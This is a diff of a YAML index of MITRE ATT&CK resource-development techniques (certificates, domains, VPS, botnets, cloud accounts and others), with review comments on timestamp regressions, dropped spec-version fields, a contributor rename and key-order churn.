x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1583.008:
technique:
- modified: '2023-04-17T15:32:39.470Z'
+ modified: '2024-10-16T20:10:08.246Z'
name: Malvertising
description: "Adversaries may purchase online advertisements that can be abused
to distribute malware to victims. Ads can be purchased to plant as well as
@@ -108343,7 +109023,7 @@ resource-development:
phase_name: resource-development
x_mitre_contributors:
- Tom Hegel
- - Goldstein Menachem
+ - Menachem Goldstein
- Hiroki Nagahama, NEC Corporation
- Manikantan Srinivasan, NEC Corporation India
- Pooja Natarajan, NEC Corporation India
@@ -108392,43 +109072,12 @@ resource-development:
url: https://labs.guard.io/masquerads-googles-ad-words-massively-abused-by-threat-actors-targeting-organizations-gpus-42ae73ee8a1e
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1588.004:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--19401639-28d0-4c3c-adcc-bc2ba22f6421
- type: attack-pattern
- created: '2020-10-01T02:14:18.044Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1588.004
- url: https://attack.mitre.org/techniques/T1588/004
- - description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
- Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
- source_name: DiginotarCompromise
- url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
- - source_name: Let's Encrypt FAQ
- url: https://letsencrypt.org/docs/faq/
- description: Let's Encrypt. (2020, April 23). Let's Encrypt FAQ. Retrieved
- October 15, 2020.
- - source_name: Splunk Kovar Certificates 2017
- url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
- description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
- Certificates. Retrieved October 16, 2020.
- - source_name: Recorded Future Beacon Certificates
- url: https://www.recordedfuture.com/cobalt-strike-servers/
- description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
- Rogue Cobalt Strike Servers. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-16T16:19:41.567Z'
name: Digital Certificates
description: |-
Adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner.
@@ -108441,18 +109090,49 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_deprecated: false
x_mitre_detection: |-
Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)
Detection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001), [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002), and/or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Certificate: Certificate Registration'
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--19401639-28d0-4c3c-adcc-bc2ba22f6421
+ created: '2020-10-01T02:14:18.044Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1588/004
+ external_id: T1588.004
+ - source_name: DiginotarCompromise
+ description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
+ Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
+ url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
+ - source_name: Recorded Future Beacon Certificates
+ description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
+ Rogue Cobalt Strike Servers. Retrieved September 16, 2024.
+ url: https://www.recordedfuture.com/research/cobalt-strike-servers
+ - source_name: Splunk Kovar Certificates 2017
+ description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+ Certificates. Retrieved October 16, 2020.
+ url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+ - source_name: Let's Encrypt FAQ
+ description: Let's Encrypt. (2020, April 23). Let's Encrypt FAQ. Retrieved
+ October 15, 2020.
+ url: https://letsencrypt.org/docs/faq/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1583.002:
technique:
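Review bot: the substantive change for T1588.004 across this and the preceding hunk is the Recorded Future reference moving from `/cobalt-strike-servers/` to `/research/cobalt-strike-servers` with an updated retrieved date, plus the newly explicit `revoked: false` and `x_mitre_deprecated: false`; `x_mitre_version` stays at 1.2, which is consistent with a reference-only fix. The remaining roughly 70 changed lines move platforms, domains, markings, id, type, created and the reference list from the top of the object to the bottom and reorder the references, so a key-order-stable generator would have reduced this to about six lines.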
@@ -108474,7 +109154,7 @@ resource-development:
url: https://unit42.paloaltonetworks.com/dns-tunneling-how-dns-can-be-abused-by-malicious-actors/
description: 'Hinchliffe, A. (2019, March 15). DNS Tunneling: how DNS can
be (ab)used by malicious actors. Retrieved October 3, 2020.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T02:49:49.702Z'
name: DNS Server
description: |-
Adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of hijacking existing DNS servers, adversaries may opt to configure and run their own DNS servers in support of operations.
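Review bot: the `modified` timestamp on T1583.002 (DNS Server) moves backwards, from `'2022-04-25T14:00:00.188Z'` to `'2021-04-15T02:49:49.702Z'`, while nothing else in the object changes. Confirm this is the value carried by the upstream STIX bundle the index was regenerated from rather than a stale input: the same regression appears below for T1587.003, T1587.001, T1586.001, T1588.006, T1583.005, T1587.002, T1584.003 and T1588.001, and any consumer that detects updates by comparing `modified` will read these entries as older revisions.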
@@ -108490,8 +109170,6 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1587.003:
technique:
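Review bot: both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` are removed from T1583.002 here with nothing added in their place, whereas for T1586.003 and T1583.003 later in this patch `x_mitre_attack_spec_version` is kept and bumped to `3.2.0`. Check that the T1583.002 object still carries an `x_mitre_attack_spec_version` somewhere else in its key block; if not, the regenerated index mixes objects with and without the field and anything that reads it has to handle its absence.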
@@ -108513,7 +109191,7 @@ resource-development:
url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
Certificates. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-16T17:32:34.604Z'
name: Digital Certificates
description: |-
Adversaries may create self-signed SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. In the case of self-signing, digital certificates will lack the element of trust associated with the signature of a third-party certificate authority (CA).
@@ -108533,8 +109211,6 @@ resource-development:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1587.001:
technique:
@@ -108573,7 +109249,7 @@ resource-development:
description: 'FireEye Labs. (2015, July). HAMMERTOSS: Stealthy Tactics Define
a Russian Cyber Threat Group. Retrieved September 17, 2015.'
url: https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-01-14T17:14:27.890Z'
name: Malware
description: |-
Adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors (including backdoored images), packers, C2 protocols, and the creation of infected removable media. Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: ActiveMalwareEnergy)(Citation: FBI Flash FIN7 USB)
@@ -108594,8 +109270,6 @@ resource-development:
x_mitre_data_sources:
- 'Malware Repository: Malware Content'
- 'Malware Repository: Malware Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1586.001:
technique:
@@ -108625,7 +109299,7 @@ resource-development:
description: Ryan, T. (2010). “Getting In Bed with Robin Sage.”. Retrieved
March 6, 2017.
url: http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-16T17:15:12.169Z'
name: Social Media Accounts
description: "Adversaries may compromise social media accounts that can be used
during targeting. For operations incorporating social engineering, the utilization
@@ -108662,8 +109336,6 @@ resource-development:
x_mitre_data_sources:
- 'Persona: Social Media'
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1588.006:
technique:
@@ -108685,7 +109357,7 @@ resource-development:
url: https://nvd.nist.gov/
description: National Vulnerability Database. (n.d.). National Vulnerability
Database. Retrieved October 15, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:16:32.119Z'
name: Vulnerabilities
description: |-
Adversaries may acquire information about vulnerabilities that can be used during targeting. A vulnerability is a weakness in computer hardware or software that can, potentially, be exploited by an adversary to cause unintended or unanticipated behavior to occur. Adversaries may find vulnerability information by searching open databases or gaining access to closed vulnerability databases.(Citation: National Vulnerability Database)
@@ -108707,8 +109379,6 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1583.005:
technique:
@@ -108745,7 +109415,7 @@ resource-development:
description: Brian Krebs. (2016, October 27). Are the Days of “Booter” Services
Numbered?. Retrieved May 15, 2017.
url: https://krebsonsecurity.com/2016/10/are-the-days-of-booter-services-numbered/
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T02:49:14.664Z'
name: Botnet
description: 'Adversaries may buy, lease, or rent a network of compromised systems that
can be used during targeting. A botnet is a network of compromised systems
@@ -108767,8 +109437,6 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1608.004:
technique:
@@ -108830,7 +109498,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1587.002:
technique:
@@ -108852,7 +109519,7 @@ resource-development:
description: Wikipedia. (2015, November 10). Code Signing. Retrieved March
31, 2016.
source_name: Wikipedia Code Signing
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:07:08.549Z'
name: Code Signing Certificates
description: |-
Adversaries may create self-signed code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.
@@ -108870,8 +109537,6 @@ resource-development:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Malware Repository: Malware Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1584.003:
technique:
@@ -108906,7 +109571,7 @@ resource-development:
url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
Shodan. Retrieved October 12, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T15:59:02.770Z'
name: Virtual Private Server
description: |-
Adversaries may compromise third-party Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. Adversaries may compromise VPSs purchased by third-party entities. By compromising a VPS to use as infrastructure, adversaries can make it difficult to physically tie back operations to themselves.(Citation: NSA NCSC Turla OilRig)
@@ -108925,33 +109590,31 @@ resource-development:
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- 'Internet Scan: Response Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1586.003:
technique:
- modified: '2022-10-21T14:21:57.991Z'
+ modified: '2024-10-16T21:26:36.312Z'
name: Cloud Accounts
description: |-
- Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)
+ Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Additionally, cloud-based messaging services such as Twilio, SendGrid, AWS End User Messaging, AWS SNS (Simple Notification Service), or AWS SES (Simple Email Service) may be leveraged for spam or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022)(Citation: Netcraft SendGrid 2024) Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)
A variety of methods exist for compromising cloud accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, conducting [Password Spraying](https://attack.mitre.org/techniques/T1110/003) attacks, or attempting to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s.(Citation: MSTIC Nobelium Oct 2021) Prior to compromising cloud accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. In some cases, adversaries may target privileged service provider accounts with the intent of leveraging a [Trusted Relationship](https://attack.mitre.org/techniques/T1199) between service providers and their customers.(Citation: MSTIC Nobelium Oct 2021)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_contributors:
+ - Francesco Bigarella
+ x_mitre_deprecated: false
x_mitre_detection: 'Much of this activity will take place outside the visibility
of the target organization, making detection of this behavior difficult. Detection
efforts may be focused on related stages of the adversary lifecycle, such
as during exfiltration (ex: [Transfer Data to Cloud Account](https://attack.mitre.org/techniques/T1537)).'
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Francesco Bigarella
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
type: attack-pattern
id: attack-pattern--3d52e51e-f6db-4719-813c-48002a99f43a
created: '2022-05-27T14:30:01.904Z'
@@ -108961,10 +109624,19 @@ resource-development:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1586/003
external_id: T1586.003
+ - source_name: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022
+ description: 'Dror Alon. (2022, December 8). Compromised Cloud Compute Credentials:
+ Case Studies From the Wild. Retrieved March 9, 2023.'
+ url: https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/
- source_name: Awake Security C2 Cloud
description: 'Gary Golomb and Tory Kei. (n.d.). Threat Hunting Series: Detecting
Command & Control in the Cloud. Retrieved May 27, 2022.'
url: https://awakesecurity.com/blog/threat-hunting-series-detecting-command-control-in-the-cloud/
+ - source_name: Netcraft SendGrid 2024
+ description: Graham Edgecombe. (2024, February 7). Phishception – SendGrid
+ is abused to host phishing attacks impersonating itself. Retrieved October
+ 15, 2024.
+ url: https://www.netcraft.com/blog/popular-email-platform-used-to-impersonate-itself/
- source_name: MSTIC Nobelium Oct 2021
description: Microsoft Threat Intelligence Center. (2021, October 25). NOBELIUM
targeting delegated administrative privileges to facilitate broader attacks.
@@ -108972,9 +109644,8 @@ resource-development:
url: https://www.microsoft.com/security/blog/2021/10/25/nobelium-targeting-delegated-administrative-privileges-to-facilitate-broader-attacks/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1586.002:
technique:
@@ -109025,11 +109696,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1608.001:
technique:
- modified: '2023-04-11T23:22:49.534Z'
+ modified: '2024-10-16T20:13:40.501Z'
name: Upload Malware
description: |-
Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server.
@@ -109042,7 +109712,7 @@ resource-development:
phase_name: resource-development
x_mitre_contributors:
- Kobi Haimovich, CardinalOps
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
If infrastructure or patterns in malware have been previously identified, internet scanning may uncover when an adversary has staged malware to make it accessible for targeting.
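Review bot: the contributor entry is corrected from `Goldstein Menachem` to `Menachem Goldstein`, and the same rename is applied to T1584 and T1608.005 further down; grep the rest of the index for any remaining `Goldstein Menachem` so the contributor does not end up listed under two spellings.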
@@ -109077,22 +109747,25 @@ resource-development:
url: https://blog.talosintelligence.com/ipfs-abuse/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1583.001:
technique:
- modified: '2024-04-13T14:03:04.511Z'
+ modified: '2024-09-25T15:26:00.047Z'
name: Domains
description: |-
Adversaries may acquire domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free.
- Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing) Different URIs/URLs may also be dynamically generated to uniquely serve malicious content to victims.(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique)
+ Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing)
+
+ Different URIs/URLs may also be dynamically generated to uniquely serve malicious content to victims (including one-time, single use domain names).(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique)
Adversaries may also acquire and repurpose expired domains, which may be potentially already allowlisted/trusted by defenders based on an existing reputation/history.(Citation: Categorisation_not_boundary)(Citation: Domain_Steal_CC)(Citation: Redirectors_Domain_Fronting)(Citation: bypass_webproxy_filtering)
Domain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1)
+
+ In addition to legitimately purchasing a domain, an adversary may register a new domain in a compromised environment. For example, in AWS environments, adversaries may leverage the Route53 domain service to register a domain and create hosted zones pointing to resources of the threat actor’s choosing.(Citation: Invictus IR DangerDev 2024)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
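Review bot: the two inserted blank `+` lines in the Domains description sit inside a `|-` literal block, where they become paragraph breaks in the rendered text; make sure the generator emits them with no trailing whitespace, since YAML would carry that into the description. The new Route53 paragraph cites `Invictus IR DangerDev 2024`, whose `external_references` entry is added in the `@@ -109152` hunk below, and the `x_mitre_version` bump from `'1.3'` to `'1.4'` in the next hunk is consistent with a description change.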
@@ -109113,7 +109786,7 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- PRE
- x_mitre_version: '1.3'
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Domain Name: Passive DNS'
- 'Domain Name: Domain Registration'
@@ -109152,6 +109825,10 @@ resource-development:
description: 'FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE
OPERATIONS?. Retrieved August 19, 2015.'
url: https://web.archive.org/web/20151022204649/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf
+ - source_name: Invictus IR DangerDev 2024
+ description: Invictus Incident Response. (2024, January 31). The curious case
+ of DangerDev@protonmail.me. Retrieved March 19, 2024.
+ url: https://www.invictus-ir.com/news/the-curious-case-of-dangerdev-protonmail-me
- source_name: Domain_Steal_CC
description: Krebs, B. (2018, November 13). That Domain You Forgot to Renew?
Yeah, it’s Now Stealing Credit Cards. Retrieved September 20, 2019.
@@ -109207,7 +109884,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1608.002:
technique:
@@ -109265,7 +109941,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1583.004:
technique:
@@ -109345,7 +110020,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1585.002:
technique:
@@ -109405,7 +110079,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1588.001:
technique:
@@ -109427,7 +110100,7 @@ resource-development:
description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
SunshopFireEye. Retrieved March 6, 2017.'
url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:15:52.805Z'
name: Malware
description: |-
Adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols. Adversaries may acquire malware to support their operations, obtaining a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.
@@ -109446,42 +110119,10 @@ resource-development:
x_mitre_data_sources:
- 'Malware Repository: Malware Metadata'
- 'Malware Repository: Malware Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1583.003:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--79da0971-3147-4af6-a4f5-e8cd447cd795
- type: attack-pattern
- created: '2020-10-01T00:44:23.935Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1583.003
- url: https://attack.mitre.org/techniques/T1583/003
- - source_name: TrendmicroHideoutsLease
- description: 'Max Goncharov. (2015, July 15). Criminal Hideouts for Lease:
- Bulletproof Hosting Services. Retrieved March 6, 2017.'
- url: https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf
- - source_name: ThreatConnect Infrastructure Dec 2020
- url: https://threatconnect.com/blog/infrastructure-research-hunting/
- description: 'ThreatConnect. (2020, December 15). Infrastructure Research
- and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
- - source_name: Mandiant SCANdalous Jul 2020
- url: https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation
- description: Stephens, A. (2020, July 13). SCANdalous! (External Detection
- Using Network Scan Data and Automation). Retrieved October 12, 2021.
- - source_name: Koczwara Beacon Hunting Sep 2021
- url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
- description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
- Shodan. Retrieved October 12, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T13:22:11.113Z'
name: Virtual Private Server
description: |-
Adversaries may rent Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. By utilizing a VPS, adversaries can make it difficult to physically tie back operations to them. The use of cloud infrastructure can also make it easier for adversaries to rapidly provision, modify, and shut down their infrastructure.
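Review bot: this hunk deletes the entire `external_references` list, `object_marking_refs`, `id`, `type`, `created` and `created_by_ref` of T1583.003 only for the following hunk to re-add them with identical content in a different key order; the substantive changes to the object are the `modified` value, the new `revoked: false` and `x_mitre_deprecated: false`, and the `x_mitre_attack_spec_version` bump from `2.1.0` to `3.2.0`. If the index is generated from the STIX bundle, writing keys in a stable (for example sorted) order would shrink such diffs to the real changes and make the `modified` and version fields easier to review.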
@@ -109490,22 +110131,53 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_deprecated: false
x_mitre_detection: |-
